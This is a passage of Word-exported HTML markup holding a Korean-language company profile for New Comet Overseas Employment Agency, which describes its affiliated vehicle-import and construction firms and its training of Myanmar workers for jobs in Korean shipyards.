lang=\"KO\">뉴코멧무역대행</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\"> 2023</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">년</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">뉴코멧</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">외국인고용업</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">면허를</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">취득하여</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">서비스</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">활동을</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">시작하였습니다</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\">.</span></p><p class=\"MsoNormal\"><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">저희 <strong>뉴코멧</strong></span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\"><strong>&nbsp;</strong></span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\"><strong>해외직업소개회사</strong>&nbsp;</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\">\"New Comet Overseas Employment Agency\"</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">는자매</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">회사인&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;mso-spacerun:yes;\" xml:lang=\"KO\" lang=\"KO\"> </span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\"><strong>제야뉴코멧 자동차 판매 및 서비스 회사</strong></span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\">, </span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\"><strong>뉴코멧회사</strong>등</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">기업들과</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">협력하여</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">경제통상자원부에서&nbsp;</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;mso-spacerun:yes;\" xml:lang=\"KO\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">차량</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">수입허가를</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">신청했고</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">각종</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">상용트럭</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\">, </span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">관광</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">산업 및</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">운송에</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">사용되는</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">다양한</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">유형의</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">버스</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">및</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">기계를</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">일본에서</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">직접</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">구매 판매하는</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">사업을</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\"> 25</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">년</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">이상&nbsp;</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;mso-spacerun:yes;\" xml:lang=\"KO\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">종사해</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">왔고 나라를 위한 정한 세금들을 냈습니다</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\">. </span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">게다가</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\">100 </span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">명 이상의</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">직원에게</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">고용</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">기회를</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">제공했습니다</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\">.</span></p><p class=\"MsoNormal\"><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">또한</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">쌍둥이</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">회사인</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\"><strong>뉴코멧건설 회사</strong></span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\"><strong>, </strong></span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\"><strong>제야슈웨삐띡 건설 회사</strong></span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\"><strong>, </strong></span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\"><strong>아웅네원 회사</strong>들은 정부</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">부처로부터</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">입찰&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\">(tender)</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">을</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">받고</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">건설</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">작업을</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">하는</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">동안</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\"> 200</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">명</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">이상의</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">직원에게</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">고용</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">기회를</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">제공했습니다</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\">.</span></p><p class=\"MsoNormal\"><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">저희&nbsp;</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\">\"</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\"><strong>뉴코멧</strong></span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\"><strong>해외직업소개회사</strong></span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\">\"</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">는 현재에</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">한국</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">조선소들에 일하고 싶은 미얀마</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">각지에서</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">온</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">소수민족</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">형제들을 교통통신부</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">산하</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">씬마락</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\"> (Sinmalike)</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">조선소에 트레이너들와 함께 훌령한 기능공이</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun 